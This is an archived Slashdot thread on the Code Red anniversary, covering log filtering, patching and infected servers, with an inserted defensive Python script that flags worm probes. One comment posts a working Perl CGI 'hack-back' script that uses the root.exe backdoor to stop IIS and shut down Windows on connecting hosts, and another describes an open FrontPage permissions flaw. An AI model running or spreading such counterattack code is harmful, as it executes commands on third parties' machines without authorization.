Slashdot Mirror


Happy Birthday Code Red

totallygeek writes: "One year ago today (July 19, 2001), more than 359,000 computers were infected with the Code Red worm in less than 14 hours. At the peak of infection, more than 2,000 new machines were infected each minute. Servers running Internet Information Services from Microsoft were propagating this worm across the Internet faster than anything has up to then or since. For the first time, systems running the Apache web server were getting requests for a document called "default.ida". Here we are a year later, and my web log shows an average of forty-two requests per day for default.ida over the last five days. To really appreciate the spread of this program, look at this animated image."

20 of 364 comments

  1. Re:Logs Clogged by odaiwai · · Score: 5, Informative

    That's the Nimda worm. Running Apache, you're immune to it, but it makes a mess in your logs.

    One thing to do is have a cron job to scan your logs and, if it sees any of the above, add the IP to an iptables blocklist. At least that way, you only get hit once by it from each infected host.

    Or you could use Apache's rewrite rules to forward all attacks to www.micrsoft.com, but I wouldn't recommend that.

    dave
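An added example, not code from the thread, of the cron-driven log scan odaiwai describes above: it parses Apache combined-format lines, flags the Code Red (default.ida) and Nimda (root.exe/cmd.exe) probe signatures the thread mentions, and emits one iptables DROP rule per probing host, skipping hosts already blocked so repeated runs never append a rule twice. The sample log lines, the signature patterns and the exact iptables rule form are assumptions made for this example.

```python
import re

# Request-path signatures for the two worms in this thread: Code Red's
# "default.ida" probe and Nimda's root.exe/cmd.exe probes via /scripts, /c,
# /d, /_mem_bin, /_vti_bin and /msadc. Patterns constructed for this example.
WORM_SIGNATURES = {
    "code-red": re.compile(r"^/default\.ida", re.I),
    "nimda": re.compile(r"^/(scripts|c|d|_mem_bin|_vti_bin|msadc)/.*(root|cmd)\.exe", re.I),
}
# Apache "combined" format: ip ident user [time] "method path proto" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" \d{3} ')

def classify(path):
    """Name the worm whose probe signature matches this request path, else None."""
    for name, rx in WORM_SIGNATURES.items():
        if rx.search(path):
            return name
    return None

def scan(lines):
    """Map each probing client IP to {"worm": first worm seen, "hits": count}.
    Unparseable lines and benign requests (page loads, robots.txt) are ignored."""
    hosts = {}
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        worm = classify(m.group("path"))
        if worm is None:
            continue
        entry = hosts.setdefault(m.group("ip"), {"worm": worm, "hits": 0})
        entry["hits"] += 1
    return hosts

def blocklist_commands(hosts, already_blocked=()):
    """One iptables DROP rule per newly seen probing host; hosts already on the
    blocklist are skipped so repeated cron runs never append a rule twice."""
    return [f"iptables -A INPUT -s {ip} -p tcp --dport 80 -j DROP"
            for ip in sorted(hosts) if ip not in already_blocked]

# Constructed sample log lines (documentation IP ranges), not from the thread.
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Jul/2002:03:14:07 +0000] "GET /default.ida?NNNNNNNN%u9090%u6858 HTTP/1.0" 404 284 "-" "-"',
    '192.0.2.10 - - [19/Jul/2002:03:14:09 +0000] "GET /default.ida?XXXXXXXX%u9090%u6858 HTTP/1.0" 404 284 "-" "-"',
    '198.51.100.7 - - [19/Jul/2002:03:20:11 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 279 "-" "-"',
    '198.51.100.7 - - [19/Jul/2002:03:20:12 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-"',
    '203.0.113.5 - - [19/Jul/2002:04:01:55 +0000] "GET /robots.txt HTTP/1.1" 200 42 "-" "Googlebot/2.1"',
]
if __name__ == "__main__": print("\n".join(blocklist_commands(scan(SAMPLE_LOG))))
```

In a real cron job the previous run's output would be the `already_blocked` set, and the crawler line shows why the match is on the worm's request path rather than on any 404.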

  2. The image is... by timecop · · Score: 0, Informative

    4,375,130 bytes long.
    It's either really detailed or someone wanted to play a dirty trick on the admin.
    I'm still downloading it, at about 1.5k/second. :)

  3. Alternate URL for animated image by totallygeek · · Score: 3, Informative
    1. Re:Alternate URL for animated image by millette · · Score: 2, Informative

      Not sure which image you got. I was able to download the 4.2 GiB file and converted that to an MPEG-4 (overkill, but I don't have anything to mess with GIFs; I just recorded a "playback"). I've put the 400 KiB result here, if anyone is interested: http://tools.waglo.com:8888/codered.wmv if anyone is interested. Oh, you're gonna have to right-click, shift-click, whatever you have to do to download it. Like I said, it's just a quick and dirty job, and I'm not gonna leave it up longer than I have to.

  4. Re:Logs Clogged by timecop · · Score: 5, Informative

    Many months ago, when default.ida was the rage around the www, I added these couple of lines to my httpd.conf:

    SetEnvIf Request_URI "^/default.ida" dontlog
    ErrorLog logs/254-error_log
    CustomLog logs/254-access_log combined env=!dontlog

    Check out SetEnvIf in the Apache docs; you can do even better than this.

  5. My school district's by DMDx86 · · Score: 5, Informative

    Server is still infected with an IIS virus (though not Code Red). Here it is

    I sent them an email - almost a year ago in fact. They just brushed me off and gave a rather pathetic excuse ("the box is too slow to run Norton").
    You can read the e-mail here.

    Of course, these are the same people who run a trouble ticket server on the district wide WAN that any old joe at school can access and see where the security issues are.

    1. Re:My school district's by Qnal · · Score: 3, Informative

      Weird, I found a sadmind/IIS worm infection on a Texas community college website. I sent an email to the administrator but never got a reply back. I checked and it's fixed now though.

      Another rampant problem with IIS that is still VERY VERY widespread: older servers, IIS 4.0 mainly and some 5.0, that have FrontPage extensions installed have botched NTFS permissions on the "Front Page Web".

      I don't know if anyone has noticed this, but if you have Microsoft FrontPage installed on your browser, a little button shows up on your Internet Explorer toolbar. The default is usually the Word icon, as in "edit this page with Microsoft Word", but if you have FrontPage installed on your computer, you can select "Edit with FrontPage", and FrontPage will attempt to communicate with the web server for remote authoring. Now, if this web server is an IIS server, has FrontPage Extensions installed for remote authoring, and the NTFS permissions have not been set correctly, it will give you, the IUSR_ (Internet User) account, FULL privileges to change the "Front Page web".

      As of now, I know 3 high-profile companies who have this issue with their sites WIDE OPEN. Anyone can waltz in and alter their website using the IUSR_ account. I would like to let them know, but how do I know they are not going to accuse me of something I didn't do and just happened to stumble on?

      Oh well.

    2. Re:My school district's by DMDx86 · · Score: 2, Informative

      There is an Apache fix that will patch the older versions of Apache. That is what I did on my webserver.

  6. What pisses me off by Com2Kid · · Score: 4, Informative

    What pisses me off is that when an early exploit was detected a while back (err, many years), somebody released a worm to go around and fix it, but THEY were the ones who got in trouble with the FBI, thus setting a precedent for the future saying that the computer community was not allowed to take all necessary steps to fix problems that may pop up.

    Kind of killed off community effort right there. >;(

  7. Re:Looking at my records by spongman · · Score: 5, Informative
    no, he's right:

    6/18: MS sends MS01-33: Unchecked Buffer in Index Server ISAPI Extension Could Enable Web Server Compromise - Run code of attacker's choice.

    7/18: CodeRed hits, those of us who installed the MS01-33 patch laugh.

    7/30: MS et al. send out another alert urging people to read MS01-33 and install the patch.

  8. Re:Logs Clogged by rossz · · Score: 3, Informative

    robots.txt has a legitimate use. Redirecting attempts to access it would be extremely stupid.

    When a legitimate bot such as Google scans your system, it looks in robots.txt to find out where NOT to scan, in case you have web pages you do not wish to be searchable.

    --
    -- Will program for bandwidth
  9. Re:I still have my fake default.ida by FueledByRamen · · Score: 2, Informative

    I just knocked together this Perl script to send those items out; run it as a CGI script. Any comments / suggestions? WARNING: I'm still learning Perl... this could be (is?) ugly!

    #!/usr/bin/perl
    # This is a CGI script. Properly linked from your
    # web server, it turns around and issues commands
    # to a code red-infected server that is trying
    # to kill your server. Make $YOURSERVER/default.ida run
    # this CGI script, and watch the other server stop its
    # IIS service and shut down windows.

    use LWP::Simple;
    my $incoming;
    my $request;

    print "HTTP/1.0 200 OK\n\nBeginning rooting of your code-red-infested box...\n";
    print "This could look weird on your logs if you're not infected and just poking around.\n\n";

    $request = sprintf("http://%s/scripts/root.exe?/c+iisreset+/stop",$ENV{REMOTE_ADDR});
    $incoming = get $request;
    print "\n", $request, "\n\n", $incoming, "\n\n";

    $request = sprintf("http://%s/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEX+5",$ENV{REMOTE_ADDR});
    $incoming = get $request;
    print "\n", $request, "\n\n", $incoming, "\n\n";

    #Obligatory /. reference
    print "YHBT. Have a nice day.\n\n";

    --
    Every cloud has a silver lining (except for the mushroom shaped ones, which have a lining of Iridium & Strontium 90)
  10. Re:Logs Clogged by Marqis · · Score: 2, Informative
    Create a .htaccess file (in the root of your website) containing:

    redirect /scripts http://www.stoptheviruscold.invalid
    redirect /c http://www.stoptheviruscold.invalid
    redirect /d http://www.stoptheviruscold.invalid
    redirect /_mem_bin http://stoptheviruscold.invalid
    redirect /_vti_bin http://stoptheviruscold.invalid
    redirect /msadc http://stoptheviruscold.invalid
    redirect /MSADC http://www.stoptheviruscold.invalid
    RedirectMatch (.*)/cmd\.exe$ http://stoptheviruscold.invalid$1

  11. Re:Logs Clogged by onki · · Score: 2, Informative

    Use mod_rewrite to direct those scans to a cgi/web script. I'm storing them in a database which is being read as soon as my firewall starts (laptop). Completely automated.

  12. Re:Interesting... by Zocalo · · Score: 4, Informative
    In this case I tend to partly side with Microsoft. OK, they put the bug there in the first place, but when you consider that:
    • Every coder makes programming errors (some more than others, true).
    • Microsoft released a *working* patch a few months before the exploits started.
    • A workaround was also available.
    • A properly installed & configured server was *not* vulnerable.
    • A web server does not need to *establish* outbound HTTP connections through the firewall, only to accept and reply to them.
    You kind of get an idea where they are coming from.

    PS. That last point is the crux, and denying webservers the ability to establish outbound HTTP connections would have stopped Code Red type exploits dead. If your network is properly configured, even if you are exploited, then the exploit should have a much harder time propagating and thus making you look like a complete incompetent. The *real* problem is that a *huge* proportion of sysadmins don't seem to understand the most basic of security principles, and that's not Microsoft's problem at all.

    --
    UNIX? They're not even circumcised! Savages!
  13. Mirror by Kjellander · · Score: 2, Informative
  14. Re:How did the Cherry Mountain Dew get its name? by Alex_Ionescu · · Score: 2, Informative

    Actually, the worm got its virus from the drink.
    Late at night, the programmers were drinking away their cans, when they identified the virus. They called it Code Red.

  15. The 1% Patch Statistic by Proudrooster · · Score: 4, Informative

    Believe it or not, out of all the people in the world running MS Outlook, fewer than 1% have ever pulled down security patches; see The Great MS Patch Nobody Uses.

    Additionally, the Win2K/NT server guys are afraid to install security patches since they are never really sure how much of their server is going to break. Oftentimes, admins will patch the servers which touch the Internet but not the internal servers, for fear of breaking them. With Code Red, this was quite humorous because the outer servers were patched as soon as the Code Red patch was available, thinking this action would defend the realm against Code Red, but they forgot about the laptop users who brought Code Red in the back door via the local LAN.

    But not to worry folks, once we get Palladium hardware in all our servers, this will not happen again right? In fact we won't even have to patch anymore, since everything will be secure and, only secure applications will be allowed to run.

    Oh, wait, wouldn't IIS pass the palladium trusted application test?

    Why yes it would...... and Code Red would join the list of "Trusted Secure Applications"!
    Sorry, I have to smack Palladium every time I get a chance.

  16. Re:Ya think? by ninjaz · · Score: 3, Informative

    I just looked into the 22 Code Red hits one of my hosts has gotten from midnight to 9am today.

    The results are:

    5 down
    14 reported as a Windows variant by nmap
    2 unknown
    1 Linux

    I looked into the 2 unknown results a bit more. Both respond on port 80 with an IIS banner and ASPSESSIONID cookies. One of them has a Serv-U banner for ftp as well.

    Interestingly, one of them (the one w/o Serv-U) is a .gov.cn site.

    The Linux result answers on port 443 as a vulnerable version of Apache on someone's firewall in Italy. This is likely being used as a launchpad for attacks.

    So, from what I gather, the bulk of the ongoing Code Red attacks are from Windows machines with extremely negligent administrators.